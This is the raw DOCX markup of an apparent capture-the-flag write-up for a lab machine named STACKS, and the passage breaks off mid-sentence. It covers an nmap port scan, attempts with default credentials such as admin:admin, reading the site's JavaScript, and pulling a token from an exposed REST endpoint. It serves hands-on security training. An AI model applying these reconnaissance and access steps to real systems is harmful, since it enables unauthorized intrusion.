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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.md5x29xlq8di" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.w1hcz8xjrvf5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Hacking Club</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">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Hacking Club is a platform to learn cybersecurity, an incredible resource if you don’t know where to start. In addition to vulnerable machines, you have access to classes and challenges to practice your skills and access to an exclusive community to play and challenge yourself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The best part about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Club</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that it is very hands-on. If you are new to hacking, give it a try.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.le3alcaxdf4o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">STACKS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>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0C">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We need to know which services are running in the background and which ports are open. So, we will use a tool called nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>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0E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1422400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1422400"/>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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 22 – SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 80 – HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 111 – RPCBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 27017 – MONGODB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>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17">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353050" cy="7886700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5353050" cy="7886700"/>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19">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We will start by testing default login credentials, for example: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin, guest:guest, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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But without success. So we will look at the page source code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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Inspecting the source code, we find →</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /assets/main.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which contains the page’s JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>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1D">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3390900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3390900"/>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1F">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We can retrieve our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>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21">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3733800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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5943600" cy="3733800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, we discover several routes to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/restapi/getAllRoutes, /restapi/getStacks, /restapi/getDefaultSettings. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By sending a request to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /restapi/getDefaultSettings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we receive a valid </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>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23">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827575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="30802" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2827575"/>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25">
      <w:pPr>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26">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Now that we have a valid </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
